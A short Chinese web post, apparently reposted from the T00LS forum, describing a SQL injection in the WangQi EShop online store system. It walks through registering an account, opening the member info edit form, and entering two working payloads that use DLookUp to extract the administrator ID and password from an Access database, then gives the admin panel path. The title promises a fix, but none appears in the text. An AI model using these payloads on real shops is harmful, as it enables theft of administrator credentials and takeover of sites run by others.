注册个用户,
进入会员中心,点击[会员信息]页面进行信息修改
在表单的任何一项中都可以进入暴数据操作
暴管理员ID:l', Name = Cstr(DLookUp('memberid', 'admin')) + '
暴管理员密码:l', Name = Cstr(DLookUp('Password', 'member', 'memberid=1')) + '
红色的"1"字代表上一步暴出来的管理员ID
后台地址:web+/admin/
上面的方法得针对ACCESS的...当然如果是SQL的....啥都不用说了...大家都懂的.
下面是图片演示.
摘自 T00LS
查看更多关于网奇EShop网上商城系统注射漏洞及修复 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12819